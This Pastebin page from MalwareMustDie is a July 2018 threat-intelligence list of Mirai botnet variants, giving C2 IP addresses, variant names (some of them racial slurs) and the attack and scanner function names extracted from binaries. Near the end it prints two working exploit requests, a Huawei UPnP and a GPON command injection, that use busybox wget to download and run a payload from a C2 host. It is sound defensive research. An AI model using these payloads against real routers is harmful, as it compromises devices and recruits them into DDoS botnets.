API tools faq
paste
Advertisement
MalwareMustDie

Mirai functions July 2018

MalwareMustDie
Jul 21st, 2018
62
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Lua 22.17 KB | None | 0 0
raw download clone embed print report
  1. # This are the list of Mirai C2 and panel with the
  2. # current setup attack functions hardcoded in the compiled binary
  3. # collected in July 2018, by:
  4. # MalwareMustDie, NPO - @unixfreaxjp
  5. # this list is created by r2's r2pipe of rada.re!
  6.  
  7.  
  8. Jul  1 00:52 C2: 167.99.204.242 type: katrina
  9. attack_method.c
  10. attack_method_greeth
  11. attack_method_greip
  12. attack_method_std
  13. attack_method_tcpack
  14. attack_method_tcpstomp
  15. attack_method_tcpsyn
  16. attack_method_tcpxmas
  17. attack_method_udpdns
  18. attack_method_udpgeneric
  19. attack_method_udpplain
  20. attack_method_udpvse
  21. scanner_init
  22. scanner_pid
  23. scanner_rawpkt
  24.  
  25. Jul  4 08:21 C2: 178.128.148.138 type: sora
  26. attack_method.c
  27. attack_method_greeth
  28. attack_method_greip
  29. attack_method_std
  30. attack_method_tcpack
  31. attack_method_tcpstomp
  32. attack_method_tcpsyn
  33. attack_method_tcpxmas
  34. attack_method_udpdns
  35. attack_method_udpgeneric
  36. attack_method_udpplain
  37. attack_method_udpvse
  38. scanner_init
  39. scanner_pid
  40. scanner_rawpkt
  41.  
  42. Jul  2 10:45 C2: 46.101.250.158 type: AB4g5/Josho
  43. attack_method.c
  44. attack_method_greeth
  45. attack_method_greip
  46. attack_method_std
  47. attack_method_tcpack
  48. attack_method_tcpstomp
  49. attack_method_tcpsyn
  50. attack_method_tcpxmas
  51. attack_method_udpdns
  52. attack_method_udpgeneric
  53. attack_method_udpplain
  54. attack_method_udpvse
  55. scanner_init
  56. scanner_pid
  57. scanner_rawpkt
  58.  
  59. Jul  4 01:45 C2: 46.101.250.158 type: Josho
  60. attack_method.c
  61. attack_method_greeth
  62. attack_method_greip
  63. attack_method_std
  64. attack_method_tcpack
  65. attack_method_tcpstomp
  66. attack_method_tcpsyn
  67. attack_method_tcpxmas
  68. attack_method_udpdns
  69. attack_method_udpgeneric
  70. attack_method_udpplain
  71. attack_method_udpvse
  72. scanner_init
  73. scanner_pid
  74. scanner_rawpkt
  75.  
  76. Jul  2 07:35 C2: 185.244.25.138 type: iloveniggers69/Omni
  77. attack_method.c
  78. attack_method_greeth
  79. attack_method_greip
  80. attack_method_std
  81. attack_method_tcpack
  82. attack_method_tcpstomp
  83. attack_method_tcpsyn
  84. attack_method_tcpxmas
  85. attack_method_udpdns
  86. attack_method_udpgeneric
  87. attack_method_udpplain
  88. attack_method_udpvse
  89. scanner_init
  90. scanner_pid
  91. scanner_rawpkt
  92.  
  93. Jul  3 09:01 C2: 217.61.97.186 type: original
  94. scanner.c
  95. attack_method.c
  96. attack_method_asyn
  97. attack_method_cfnull
  98. attack_method_greip
  99. attack_method_http
  100. attack_method_std
  101. attack_method_tcpack
  102. attack_method_tcpall
  103. attack_method_tcpfrag
  104. attack_method_tcpsyn
  105. attack_method_tcpusyn
  106. attack_method_udpgame
  107. attack_method_udpplain
  108.  
  109. Jul  3 09:01 C2: 217.61.97.186 type: kaizen
  110. attack_method.c
  111. attack_method_asyn
  112. attack_method_cfnull
  113. attack_method_greip
  114. attack_method_http
  115. attack_method_std
  116. attack_method_tcpack
  117. attack_method_tcpall
  118. attack_method_tcpfrag
  119. attack_method_tcpsyn
  120. attack_method_tcpusyn
  121. attack_method_udpgame
  122. attack_method_udpplain
  123. scanner_init
  124. scanner_kill
  125. scanner_pid
  126. scanner_rawpkt
  127.  
  128. Jul  3 09:01 C2: 217.61.97.186 type: original
  129. attack_method.c
  130. attack_method_asyn
  131. attack_method_cfnull
  132. attack_method_greip
  133. attack_method_http
  134. attack_method_std
  135. attack_method_tcpack
  136. attack_method_tcpall
  137. attack_method_tcpfrag
  138. attack_method_tcpsyn
  139. attack_method_tcpusyn
  140. attack_method_udpgame
  141. attack_method_udpplain
  142. scanner_init
  143. scanner_kill
  144. scanner_pid
  145. scanner_rawpkt
  146.  
  147. Jul  6 22:53 C2: 217.61.97.186 type: sora
  148. attack_method.c
  149. attack_method_greeth
  150. attack_method_greip
  151. attack_method_std
  152. attack_method_tcpack
  153. attack_method_tcpstomp
  154. attack_method_tcpsyn
  155. attack_method_tcpxmas
  156. attack_method_udpdns
  157. attack_method_udpgeneric
  158. attack_method_udpplain
  159. attack_method_udpvse
  160. scanner_init
  161. scanner_pid
  162. scanner_rawpkt
  163.  
  164. Jul  3 05:38 C2: 80.211.87.122 type: sora
  165. attack_method.c
  166. attack_method_greeth
  167. attack_method_greip
  168. attack_method_std
  169. attack_method_tcpack
  170. attack_method_tcpstomp
  171. attack_method_tcpsyn
  172. attack_method_tcpxmas
  173. attack_method_udpdns
  174. attack_method_udpgeneric
  175. attack_method_udpplain
  176. attack_method_udpvse
  177. scanner_init
  178. scanner_pid
  179. scanner_rawpkt
  180.  
  181. Jul  4 21:45 C2: 209.97.138.162 type: neurosis
  182. attack_method.c
  183. telnet_scanner.c
  184. attack_method_greeth
  185. attack_method_greip
  186. attack_method_std
  187. attack_method_tcpack
  188. attack_method_tcpstomp
  189. attack_method_tcpsyn
  190. attack_method_tcpxmas
  191. attack_method_udpdns
  192. attack_method_udpgeneric
  193. attack_method_udpplain
  194. attack_method_udpvse
  195. scanner_init
  196. scanner_pid
  197. scanner_rawpkt
  198.  
  199.  
  200. Jul  7 07:59 C2: 209.97.138.162 type: nigger
  201. attack_method.c
  202. attack_method_greeth
  203. attack_method_greip
  204. attack_method_std
  205. attack_method_tcpack
  206. attack_method_tcpstomp
  207. attack_method_tcpsyn
  208. attack_method_tcpxmas
  209. attack_method_udpdns
  210. attack_method_udpgeneric
  211. attack_method_udpplain
  212. attack_method_udpvse
  213. scanner_init
  214. scanner_kill
  215. scanner_pid
  216. scanner_rawpkt
  217.  
  218. Jul  7 07:59 C2: 209.97.138.162 type: exploit
  219. ascii scanner.c
  220. attack_method.c
  221. attack_method_greeth
  222. attack_method_greip
  223. attack_method_std
  224. attack_method_tcpack
  225. attack_method_tcpstomp
  226. attack_method_tcpsyn
  227. attack_method_tcpxmas
  228. attack_method_udpdns
  229. attack_method_udpgeneric
  230. attack_method_udpplain
  231. attack_method_udpvse
  232.  
  233. Jun 30 15:24 C2: 159.65.235.46 type: Josho
  234. attack_method.c
  235. attack_method_greeth
  236. attack_method_greip
  237. attack_method_std
  238. attack_method_tcpack
  239. attack_method_tcpstomp
  240. attack_method_tcpsyn
  241. attack_method_tcpxmas
  242. attack_method_udpdns
  243. attack_method_udpgeneric
  244. attack_method_udpplain
  245. attack_method_udpvse
  246. scanner_init
  247. scanner_pid
  248. scanner_rawpkt
  249.  
  250. Jul  1 00:24 C2: 159.65.235.46 type: AB4g5/Josho
  251. attack_method.c
  252. attack_method_greeth
  253. attack_method_greip
  254. attack_method_std
  255. attack_method_tcpack
  256. attack_method_tcpstomp
  257. attack_method_tcpsyn
  258. attack_method_tcpxmas
  259. attack_method_udpdns
  260. attack_method_udpgeneric
  261. attack_method_udpplain
  262. attack_method_udpvse
  263. scanner_init
  264. scanner_pid
  265. scanner_rawpkt
  266.  
  267. Jul  6 00:10 C2: 206.189.163.167 type: AB4g5/Josho
  268. attack_method.c
  269. attack_method_greeth
  270. attack_method_greip
  271. attack_method_std
  272. attack_method_tcpack
  273. attack_method_tcpstomp
  274. attack_method_tcpsyn
  275. attack_method_tcpxmas
  276. attack_method_udpdns
  277. attack_method_udpgeneric
  278. attack_method_udpplain
  279. attack_method_udpvse
  280. scanner_init
  281. scanner_pid
  282. scanner_rawpkt
  283.  
  284. Jul  7 00:42 C2: 185.244.25.133 type: sora
  285. attack_method.c
  286. attack_method_greeth
  287. attack_method_greip
  288. attack_method_std
  289. attack_method_tcpack
  290. attack_method_tcpstomp
  291. attack_method_tcpsyn
  292. attack_method_tcpxmas
  293. attack_method_udpdns
  294. attack_method_udpgeneric
  295. attack_method_udpplain
  296. attack_method_udpvse
  297. scanner_init
  298. scanner_pid
  299. scanner_rawpkt
  300.  
  301. Jul  6 01:03 C2: 217.61.120.199 type: sora
  302. attack.c
  303. attack_app.c
  304. attack_gre.c
  305. attack_tcp.c
  306. attack_udp.c
  307. attack_app_http
  308. attack_gre_eth
  309. attack_gre_ip
  310. attack_tcp_ack
  311. attack_tcp_stomp
  312. attack_tcp_syn
  313. attack_udp_generic
  314. attack_udp_plain
  315. attack_udp_vse
  316. attack_udp_dns
  317. scanner_init
  318. scanner_pid
  319. scanner_rawpkt
  320.  
  321. Jul  6 02:18 C2: 206.189.209.111 type: sora
  322. attack.c
  323. attack_app.c
  324. attack_gre.c
  325. attack_tcp.c
  326. attack_udp.c
  327. attack_app_http
  328. attack_gre_eth
  329. attack_gre_ip
  330. attack_tcp_ack
  331. attack_tcp_stomp
  332. attack_tcp_syn
  333. attack_udp_generic
  334. attack_udp_plain
  335. attack_udp_vse
  336. attack_udp_dns
  337. scanner_init
  338. scanner_pid
  339. scanner_rawpkt
  340.  
  341. Jul  4 04:17 C2: 159.89.230.82 type: Josho
  342. attack_method.c
  343. attack_method_greeth
  344. attack_method_greip
  345. attack_method_std
  346. attack_method_tcpack
  347. attack_method_tcpstomp
  348. attack_method_tcpsyn
  349. attack_method_tcpxmas
  350. attack_method_udpdns
  351. attack_method_udpgeneric
  352. attack_method_udpplain
  353. attack_method_udpvse
  354. scanner_init
  355. scanner_pid
  356. scanner_rawpkt
  357.  
  358. Jul  4 01:24 C2: 80.211.89.251 type: sora
  359. attack.c
  360. attack_app.c
  361. attack_gre.c
  362. attack_tcp.c
  363. attack_udp.c
  364. attack_app_http
  365. attack_gre_eth
  366. attack_gre_ip
  367. attack_tcp_ack
  368. attack_tcp_stomp
  369. attack_tcp_syn
  370. attack_udp_generic
  371. attack_udp_plain
  372. attack_udp_vse
  373. attack_udp_dns
  374. scanner_init
  375. scanner_pid
  376. scanner_rawpkt
  377.  
  378. Jul  5 20:42 C2: 51.15.193.249 type: kek
  379. attack_method.c
  380. attack_method_greeth
  381. attack_method_greip
  382. attack_method_std
  383. attack_method_tcpack
  384. attack_method_tcpstomp
  385. attack_method_tcpsyn
  386. attack_method_tcpxmas
  387. attack_method_udpdns
  388. attack_method_udpgeneric
  389. attack_method_udpplain
  390. attack_method_udpvse
  391. scanner_init
  392. scanner_pid
  393. scanner_rawpkt
  394.  
  395. Jul  4 01:17 C2: 80.252.107.183 type: owari
  396. attack_method.c
  397. attack_method_greeth
  398. attack_method_greip
  399. attack_method_std
  400. attack_method_tcpack
  401. attack_method_tcpstomp
  402. attack_method_tcpsyn
  403. attack_method_tcpxmas
  404. attack_method_udpdns
  405. attack_method_udpgeneric
  406. attack_method_udpplain
  407. attack_method_udpvse
  408. scanner_init
  409. scanner_pid
  410. scanner_rawpkt
  411.  
  412. Jul  4 10:29 C2: 165.227.115.67 type: AB4g5/Cult
  413. attack_method.c
  414. attack_method_greeth
  415. attack_method_greip
  416. attack_method_std
  417. attack_method_tcpack
  418. attack_method_tcpstomp
  419. attack_method_tcpsyn
  420. attack_method_tcpxmas
  421. attack_method_udpdns
  422. attack_method_udpgeneric
  423. attack_method_udpplain
  424. attack_method_udpvse
  425. scanner_init
  426. scanner_pid
  427. scanner_rawpkt
  428.  
  429. Jul  4 01:29 C2: 165.227.115.67 type: Cult
  430. attack_method.c
  431. attack_method_greeth
  432. attack_method_greip
  433. attack_method_std
  434. attack_method_tcpack
  435. attack_method_tcpstomp
  436. attack_method_tcpsyn
  437. attack_method_tcpxmas
  438. attack_method_udpdns
  439. attack_method_udpgeneric
  440. attack_method_udpplain
  441. attack_method_udpvse
  442. scanner_init
  443. scanner_pid
  444. scanner_rawpkt
  445.  
  446. Jul  3 22:34 C2: 165.227.102.171 type: sora
  447. attack_method.c
  448. attack_method_greeth
  449. attack_method_greip
  450. attack_method_std
  451. attack_method_tcpack
  452. attack_method_tcpstomp
  453. attack_method_tcpsyn
  454. attack_method_tcpxmas
  455. attack_method_udpdns
  456. attack_method_udpgeneric
  457. attack_method_udpplain
  458. attack_method_udpvse
  459. scanner_init
  460. scanner_pid
  461. scanner_rawpkt
  462.  
  463. Jul  2 19:20 C2: 178.128.248.1 type: sora
  464. attack_method.c
  465. attack_method_greeth
  466. attack_method_greip
  467. attack_method_std
  468. attack_method_tcpack
  469. attack_method_tcpstomp
  470. attack_method_tcpsyn
  471. attack_method_tcpxmas
  472. attack_method_udpdns
  473. attack_method_udpgeneric
  474. attack_method_udpplain
  475. attack_method_udpvse
  476. scanner_init
  477. scanner_pid
  478. scanner_rawpkt
  479.  
  480. Jun 27 06:43 C2: 167.99.146.93 type: Josho
  481. attack_method.c
  482. attack_method_greeth
  483. attack_method_greip
  484. attack_method_std
  485. attack_method_tcpack
  486. attack_method_tcpstomp
  487. attack_method_tcpsyn
  488. attack_method_tcpxmas
  489. attack_method_udpdns
  490. attack_method_udpgeneric
  491. attack_method_udpplain
  492. attack_method_udpvse
  493. scanner_init
  494. scanner_pid
  495. scanner_rawpkt
  496.  
  497. Jul  6 00:25 C2: 80.211.41.101 type: sora
  498. attack.c
  499. attack_app.c
  500. attack_gre.c
  501. attack_tcp.c
  502. attack_udp.c
  503. attack_app_http
  504. attack_gre_eth
  505. attack_gre_ip
  506. attack_tcp_ack
  507. attack_tcp_stomp
  508. attack_tcp_syn
  509. attack_udp_generic
  510. attack_udp_plain
  511. attack_udp_vse
  512. attack_udp_dns
  513. scanner_init
  514. scanner_pid
  515. scanner_rawpkt
  516.  
  517. Jul 12 00:36 C2: 80.211.146.193 type: Josho
  518. attack_method.c
  519. attack_method_greeth
  520. attack_method_greip
  521. attack_method_std
  522. attack_method_tcpack
  523. attack_method_tcpstomp
  524. attack_method_tcpsyn
  525. attack_method_tcpxmas
  526. attack_method_udpdns
  527. attack_method_udpgeneric
  528. attack_method_udpplain
  529. attack_method_udpvse
  530. scanner_init
  531. scanner_pid
  532. scanner_rawpkt
  533.  
  534. Jul 12 09:36 C2: 80.211.146.193 type: AB4g5/Josho
  535. attack_method.c
  536. attack_method_greeth
  537. attack_method_greip
  538. attack_method_std
  539. attack_method_tcpack
  540. attack_method_tcpstomp
  541. attack_method_tcpsyn
  542. attack_method_tcpxmas
  543. attack_method_udpdns
  544. attack_method_udpgeneric
  545. attack_method_udpplain
  546. attack_method_udpvse
  547. scanner_init
  548. scanner_pid
  549. scanner_rawpkt
  550.  
  551. Jul  8 06:19 C2: 176.107.130.143 type: sora
  552. attack.c
  553. attack_app.c
  554. attack_gre.c
  555. attack_tcp.c
  556. attack_udp.c
  557. attack_app_http
  558. attack_gre_eth
  559. attack_gre_ip
  560. attack_tcp_ack
  561. attack_tcp_stomp
  562. attack_tcp_syn
  563. attack_udp_generic
  564. attack_udp_plain
  565. attack_udp_vse
  566. attack_udp_dns
  567. scanner_init
  568. scanner_pid
  569. scanner_rawpkt
  570.  
  571. Jul  8 22:01 C2: 159.65.81.70 type: sora
  572. attack.c
  573. attack_app.c
  574. attack_gre.c
  575. attack_tcp.c
  576. attack_udp.c
  577. attack_app_http
  578. attack_gre_eth
  579. attack_gre_ip
  580. attack_tcp_ack
  581. attack_tcp_stomp
  582. attack_tcp_syn
  583. attack_udp_generic
  584. attack_udp_plain
  585. attack_udp_vse
  586. attack_udp_dns
  587. scanner_init
  588. scanner_pid
  589. scanner_rawpkt
  590.  
  591. Jul  2 13:01 C2: 94.177.253.18 type: sora
  592. attack_method.c
  593. attack_method_greeth
  594. attack_method_greip
  595. attack_method_std
  596. attack_method_tcpack
  597. attack_method_tcpstomp
  598. attack_method_tcpsyn
  599. attack_method_tcpxmas
  600. attack_method_udpdns
  601. attack_method_udpgeneric
  602. attack_method_udpplain
  603. attack_method_udpvse
  604. scanner_init
  605. scanner_pid
  606. scanner_rawpkt
  607.  
  608. Jul 10 09:12 C2: 51.15.195.195 type: dek
  609. attack_method.c
  610. attack_method_greeth
  611. attack_method_greip
  612. attack_method_std
  613. attack_method_tcpack
  614. attack_method_tcpstomp
  615. attack_method_tcpsyn
  616. attack_method_tcpxmas
  617. attack_method_udpdns
  618. attack_method_udpgeneric
  619. attack_method_udpplain
  620. attack_method_udpvse
  621. scanner_init
  622. scanner_pid
  623. scanner_rawpkt
  624.  
  625. Jul 12 14:37 C2: 178.128.163.237 type: sora
  626. attack_method.c
  627. attack_method_greeth
  628. attack_method_greip
  629. attack_method_std
  630. attack_method_tcpack
  631. attack_method_tcpstomp
  632. attack_method_tcpsyn
  633. attack_method_tcpxmas
  634. attack_method_udpdns
  635. attack_method_udpgeneric
  636. attack_method_udpplain
  637. attack_method_udpvse
  638. scanner_init
  639. scanner_pid
  640. scanner_rawpkt
  641.  
  642. Jul 11 07:22 C2: 178.132.201.154 type: original
  643. ascii scanner.c
  644. attack_method.c
  645. attack_method_asyn
  646. attack_method_cfnull
  647. attack_method_greip
  648. attack_method_http
  649. attack_method_std
  650. attack_method_tcpack
  651. attack_method_tcpall
  652. attack_method_tcpfrag
  653. attack_method_tcpsyn
  654. attack_method_tcpusyn
  655. attack_method_udpgame
  656. attack_method_udpplain
  657. scanner_kill
  658. scanner_init
  659. scanner_pid
  660. scanner_rawpkt
  661.  
  662. Jul 11 07:23 C2: 178.132.201.154 type: kaizen
  663. attack_method.c
  664. attack_method_asyn
  665. attack_method_cfnull
  666. attack_method_greip
  667. attack_method_http
  668. attack_method_std
  669. attack_method_tcpack
  670. attack_method_tcpall
  671. attack_method_tcpfrag
  672. attack_method_tcpsyn
  673. attack_method_tcpusyn
  674. attack_method_udpgame
  675. attack_method_udpplain
  676. scanner_init
  677. scanner_kill
  678. scanner_pid
  679. scanner_rawpkt
  680.  
  681. Jul 11 07:23 C2: 178.132.201.154 type: original
  682. attack_method.c
  683. attack_method_asyn
  684. attack_method_cfnull
  685. attack_method_greip
  686. attack_method_http
  687. attack_method_std
  688. attack_method_tcpack
  689. attack_method_tcpall
  690. attack_method_tcpfrag
  691. attack_method_tcpsyn
  692. attack_method_tcpusyn
  693. attack_method_udpgame
  694. attack_method_udpplain
  695. scanner_init
  696. scanner_kill
  697. scanner_pid
  698. scanner_rawpkt
  699.  
  700. Jul 10 20:21 C2: 80.211.175.27 type: AB4g5/Josho
  701. attack_method.c
  702. attack_method_greeth
  703. attack_method_greip
  704. attack_method_std
  705. attack_method_tcpack
  706. attack_method_tcpstomp
  707. attack_method_tcpsyn
  708. attack_method_tcpxmas
  709. attack_method_udpdns
  710. attack_method_udpgeneric
  711. attack_method_udpplain
  712. attack_method_udpvse
  713. scanner_init
  714. scanner_pid
  715. scanner_rawpkt
  716.  
  717. Jul 13 14:00 C2: 139.59.2.118 type: AB4g5/Josho
  718. attack_method.c
  719. attack_method_greeth
  720. attack_method_greip
  721. attack_method_std
  722. attack_method_tcpack
  723. attack_method_tcpstomp
  724. attack_method_tcpsyn
  725. attack_method_tcpxmas
  726. attack_method_udpdns
  727. attack_method_udpgeneric
  728. attack_method_udpplain
  729. attack_method_udpvse
  730. scanner_init
  731. scanner_pid
  732. scanner_rawpkt
  733.  
  734. Jul 11 11:48 C2: 178.128.15.245 type: AB4g5/Josho
  735. attack_method.c
  736. attack_method_greeth
  737. attack_method_greip
  738. attack_method_std
  739. attack_method_tcpack
  740. attack_method_tcpstomp
  741. attack_method_tcpsyn
  742. attack_method_tcpxmas
  743. attack_method_udpdns
  744. attack_method_udpgeneric
  745. attack_method_udpplain
  746. attack_method_udpvse
  747. scanner_init
  748. scanner_pid
  749. scanner_rawpkt
  750.  
  751. Jul 13 13:41 C2: 80.211.82.44 type: sora
  752. attack_method.c
  753. attack_method_greeth
  754. attack_method_greip
  755. attack_method_std
  756. attack_method_tcpack
  757. attack_method_tcpstomp
  758. attack_method_tcpsyn
  759. attack_method_tcpxmas
  760. attack_method_udpdns
  761. attack_method_udpgeneric
  762. attack_method_udpplain
  763. attack_method_udpvse
  764. scanner_init
  765. scanner_pid
  766. scanner_rawpkt
  767.  
  768. Jul 12 09:19 C2: 185.244.25.150 type: AB4g5/Cult
  769. attack_method.c
  770. attack_method_greeth
  771. attack_method_greip
  772. attack_method_std
  773. attack_method_tcpack
  774. attack_method_tcpstomp
  775. attack_method_tcpsyn
  776. attack_method_tcpxmas
  777. attack_method_udpdns
  778. attack_method_udpgeneric
  779. attack_method_udpplain
  780. attack_method_udpvse
  781. scanner_init
  782. scanner_pid
  783. scanner_rawpkt
  784.  
  785. Jul 10 06:49 C2: 167.99.164.53 type: sora
  786. attack_method.c
  787. attack_method_greeth
  788. attack_method_greip
  789. attack_method_std
  790. attack_method_tcpack
  791. attack_method_tcpstomp
  792. attack_method_tcpsyn
  793. attack_method_tcpxmas
  794. attack_method_udpdns
  795. attack_method_udpgeneric
  796. attack_method_udpplain
  797. attack_method_udpvse
  798. scanner_init
  799. scanner_pid
  800. scanner_rawpkt
  801.  
  802. Jul 13 08:31 C2: 94.177.214.233 type: sora
  803. attack_method.c
  804. attack_method_greeth
  805. attack_method_greip
  806. attack_method_std
  807. attack_method_tcpack
  808. attack_method_tcpstomp
  809. attack_method_tcpsyn
  810. attack_method_tcpxmas
  811. attack_method_udpdns
  812. attack_method_udpgeneric
  813. attack_method_udpplain
  814. attack_method_udpvse
  815. scanner_init
  816. scanner_pid
  817. scanner_rawpkt
  818.  
  819. Jul 13 09:19 C2: 159.89.189.233 type: AB4g5/Josho
  820. attack_method.c
  821. attack_method_greeth
  822. attack_method_greip
  823. attack_method_std
  824. attack_method_tcpack
  825. attack_method_tcpstomp
  826. attack_method_tcpsyn
  827. attack_method_tcpxmas
  828. attack_method_udpdns
  829. attack_method_udpgeneric
  830. attack_method_udpplain
  831. attack_method_udpvse
  832. scanner_init
  833. scanner_pid
  834. scanner_rawpkt
  835.  
  836. Jul 13 19:39 C2: 159.89.16.26 type: sora
  837. attack_method.c
  838. attack_method_greeth
  839. attack_method_greip
  840. attack_method_std
  841. attack_method_tcpack
  842. attack_method_tcpstomp
  843. attack_method_tcpsyn
  844. attack_method_tcpxmas
  845. attack_method_udpdns
  846. attack_method_udpgeneric
  847. attack_method_udpplain
  848. attack_method_udpvse
  849. scanner_init
  850. scanner_pid
  851. scanner_rawpkt
  852.  
  853. Jul 15 03:51 C2: 178.128.79.94/Josho
  854. attack_method.c
  855. attack_method_greeth
  856. attack_method_greip
  857. attack_method_std
  858. attack_method_tcpack
  859. attack_method_tcpstomp
  860. attack_method_tcpsyn
  861. attack_method_tcpxmas
  862. attack_method_udpdns
  863. attack_method_udpgeneric
  864. attack_method_udpplain
  865. attack_method_udpvse
  866. scanner_init
  867. scanner_pid
  868. scanner_rawpkt
  869.  
  870. Jul 15 12:51 C2: 178.128.79.94 type: AB4g5/Josho
  871. attack_method.c
  872. attack_method_greeth
  873. attack_method_greip
  874. attack_method_std
  875. attack_method_tcpack
  876. attack_method_tcpstomp
  877. attack_method_tcpsyn
  878. attack_method_tcpxmas
  879. attack_method_udpdns
  880. attack_method_udpgeneric
  881. attack_method_udpplain
  882. attack_method_udpvse
  883. scanner_init
  884. scanner_pid
  885. scanner_rawpkt
  886.  
  887. Jul 16 06:54 C2: 167.99.153.91 type: sora
  888. attack_method.c
  889. attack_method_greeth
  890. attack_method_greip
  891. attack_method_std
  892. attack_method_tcpack
  893. attack_method_tcpstomp
  894. attack_method_tcpsyn
  895. attack_method_tcpxmas
  896. attack_method_udpdns
  897. attack_method_udpgeneric
  898. attack_method_udpplain
  899. attack_method_udpvse
  900. scanner_init
  901. scanner_pid
  902. scanner_rawpkt
  903.  
  904. Jul 16 06:56 C2: 178.128.39.135 type: sora
  905. attack_method.c
  906. attack_method_greeth
  907. attack_method_greip
  908. attack_method_std
  909. attack_method_tcpack
  910. attack_method_tcpstomp
  911. attack_method_tcpsyn
  912. attack_method_tcpxmas
  913. attack_method_udpdns
  914. attack_method_udpgeneric
  915. attack_method_udpplain
  916. attack_method_udpvse
  917. scanner_init
  918. scanner_pid
  919. scanner_rawpkt
  920.  
  921. Jul 16 03:43 C2: 159.65.196.137 type: sora
  922. attack_method.c
  923. attack_method_greeth
  924. attack_method_greip
  925. attack_method_std
  926. attack_method_tcpack
  927. attack_method_tcpstomp
  928. attack_method_tcpsyn
  929. attack_method_tcpxmas
  930. attack_method_udpdns
  931. attack_method_udpgeneric
  932. attack_method_udpplain
  933. attack_method_udpvse
  934. scanner_init
  935. scanner_pid
  936. scanner_rawpkt
  937.  
  938. Jul 15 11:46 C2: 178.132.201.156 type: sora
  939. attack_method.c
  940. attack_method_greeth
  941. attack_method_greip
  942. attack_method_std
  943. attack_method_tcpack
  944. attack_method_tcpstomp
  945. attack_method_tcpsyn
  946. attack_method_tcpxmas
  947. attack_method_udpdns
  948. attack_method_udpgeneric
  949. attack_method_udpplain
  950. attack_method_udpvse
  951. scanner_init
  952. scanner_pid
  953. scanner_rawpkt
  954.  
  955. Jul 16 06:23 C2: 178.128.68.128 type: sora
  956. attack_method.c
  957. attack_method_greeth
  958. attack_method_greip
  959. attack_method_std
  960. attack_method_tcpack
  961. attack_method_tcpstomp
  962. attack_method_tcpsyn
  963. attack_method_tcpxmas
  964. attack_method_udpdns
  965. attack_method_udpgeneric
  966. attack_method_udpplain
  967. attack_method_udpvse
  968. scanner_init
  969. scanner_pid
  970. scanner_rawpkt
  971.  
  972. Jul 11 14:35 C2: 178.128.42.229 type: sora
  973. attack_method.c
  974. attack_method_greeth
  975. attack_method_greip
  976. attack_method_std
  977. attack_method_tcpack
  978. attack_method_tcpstomp
  979. attack_method_tcpsyn
  980. attack_method_tcpxmas
  981. attack_method_udpdns
  982. attack_method_udpgeneric
  983. attack_method_udpplain
  984. attack_method_udpvse
  985. scanner_init
  986. scanner_pid
  987. scanner_rawpkt
  988.  
  989. Jul 14 17:48 C2: 204.48.30.214 type: AB4g5/Josho
  990. attack_method.c
  991. attack_method_greeth
  992. attack_method_greip
  993. attack_method_std
  994. attack_method_tcpack
  995. attack_method_tcpstomp
  996. attack_method_tcpsyn
  997. attack_method_tcpxmas
  998. attack_method_udpdns
  999. attack_method_udpgeneric
  1000. attack_method_udpplain
  1001. attack_method_udpvse
  1002. scanner_init
  1003. scanner_pid
  1004. scanner_rawpkt
  1005.  
  1006. Jul 21 11:38 C2: 104.244.72.82 type: sister "custom"
  1007. attack_gre.c
  1008. attack_tcp.c
  1009. attack_udp.c
  1010. dlink_scanner.c
  1011. gpon_scanner.c
  1012. huawei_scanner.c
  1013. attack_gre_eth
  1014. attack_gre_ip
  1015. attack_tcp_ack
  1016. attack_tcp_stomp
  1017. attack_tcp_syn
  1018. attack_udp_dns
  1019. attack_udp_generic
  1020. attack_udp_plain
  1021. attack_udp_vse
  1022. dlinkscanner_fake_time
  1023. dlinkscanner_rsck
  1024. dlinkscanner_scanner_init
  1025. dlinkscanner_scanner_kill
  1026. dlinkscanner_scanner_pid
  1027. dlinkscanner_scanner_rawpkt
  1028. dlinkscanner_setup_connection
  1029. gponscanner_fake_time
  1030. gponscanner_rsck
  1031. gponscanner_scanner_init
  1032. gponscanner_scanner_kill
  1033. gponscanner_scanner_pid
  1034. gponscanner_scanner_rawpkt
  1035. gponscanner_setup_connection
  1036. huaweiscanner_fake_time
  1037. huaweiscanner_rsck
  1038. huaweiscanner_scanner_init
  1039. huaweiscanner_scanner_kill
  1040. huaweiscanner_scanner_pid
  1041. huaweiscanner_scanner_rawpkt
  1042. huaweiscanner_setup_connection
  1043. :
  1044. HTTP/1.1\r\nContent-Length: 430\r\nConnection: keep-alive\r\nAccept: */*\r\nAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"\r\n\r\n<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.244.72.82 -l /tmp/dgoct -r /huawei; /bin/busybox chmod 777 * /tmp/dgoct; /tmp/dgoct huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>\r\n\r\n
  1045. HTTP/1.1\r\nUser-Agent: Hello, World\r\nAccept: */*\r\nAccept-Encoding: gzip, deflate\r\nContent-Type: application/x-www-form-urlencoded\r\n\r\nXWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://104.244.72.82/gpon+-O+/tmp/pyx;sh+/tmp/pyx`&ipv=0\r\n\r\n
  1046.  
  1047. Jul 14 21:52 C2: 46.243.189.109 type: sister
  1048. attack.c
  1049. attack_gre.c
  1050. attack_tcp.c
  1051. attack_udp.c
  1052. attack_gre_eth
  1053. attack_udp_generic
  1054. attack_udp_plain
  1055. attack_udp_vse
  1056. attack_tcp_ack
  1057. attack_tcp_stomp
  1058. attack_udp_dns
  1059. attack_tcp_syn
  1060. attack_gre_ip
  1061. scanner_kill
  1062. scanner_init
  1063. scanner_pid
  1064. scanner_rawpkt
  1065.  
  1066. [EOF] MMD
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!